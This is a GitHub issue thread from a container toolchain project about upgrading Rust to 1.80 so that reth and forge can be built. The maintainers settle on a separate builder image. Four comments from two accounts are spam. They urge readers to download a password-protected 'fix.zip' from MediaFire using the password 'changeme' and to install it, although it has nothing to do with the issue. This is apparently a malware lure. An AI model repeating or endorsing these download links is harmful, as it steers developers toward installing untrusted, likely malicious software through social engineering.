### ISSUE TITLE
Bump Rust to 1.80

### ISSUE THREAD

**Issue by guidanoli** [cartesi/image-toolchain#29]
## Context

On Bug Buster, we're aiming to support Smart Contract Bounties soon.
To this end, we need an Ethereum node running inside the machine.
We've found `reth` to be a suitable candidate, in terms of maturity and performance.
However, compiling it requires Rust 1.80 or newer.
Currently, the toolchain image comes with Rust 1.77.2, which is not enough.

## Subtasks

- [ ] Verify that the new version is available on all supported platforms.
- [ ] Update build scripts and Dockerfiles

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by claudioantonio** [comment]
Besides `reth`, we also need `rustc 1.80` or newer to compile `forge`, which is another piece needed to have the smart contract bounties.

**Comment by guidanoli** [comment]
@claudioantonio I talked to @vfusco, and we agreed that Bug Buster would have its own Rust builder image.
See [`crypto-bug-hunters/rust`](https://github.com/crypto-bug-hunters/rust).

**Comment by guidanoli** [comment]
Also, the `cartesi/toolchain` has a lot of things we don't need, which are specific to the `cartesi-machine-emulator`. So, having an image of our own also allows us to greatly reduce image size.

**Comment by vfusco** [comment]
Should use it's own image. Like we do on emulator tools.
